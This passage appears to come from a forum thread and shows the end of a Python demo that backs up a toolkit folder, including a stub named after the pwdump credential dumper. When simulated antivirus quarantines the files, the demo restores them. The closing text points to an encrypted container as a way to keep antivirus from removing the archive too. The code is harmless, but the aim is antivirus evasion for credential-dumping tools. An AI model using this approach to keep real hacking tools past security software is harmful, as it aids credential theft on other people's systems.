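    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        payload = root / "payload"
        (payload / "tools").mkdir(parents=True)
        (payload / "start.bat").write_text("@echo off\r\ncall tools\\dump.bat\r\n")
        (payload / "tools" / "dump.bat").write_text("@echo dumping\r\n")
        (payload / "tools" / "pwdump.exe").write_bytes(b"MZ" + b"\x00" * 64)  # fake binary
        archive = root / "backup.zip"
        manifest = backup(payload, archive)
        # Simulated antivirus action: quarantines the binary, rewrites the batch file.
        (payload / "tools" / "pwdump.exe").unlink()
        (payload / "tools" / "dump.bat").write_text("")
        restored = restore(payload, archive)
        intact = all(sha256_file(payload / r) == d for r, d in manifest.items())
        return sorted(restored), intact


if __name__ == "__main__":
    print(run_demo())
```

Run as a script it reports tools/dump.bat and tools/pwdump.exe as restored and the whole tree matching the manifest again; start.bat, which was untouched, is not rewritten. The manifest only covers files listed at backup time, and if the antivirus quarantines the archive itself there is nothing left to restore from, which is the gap the encrypted-container idea in the thread is meant to close.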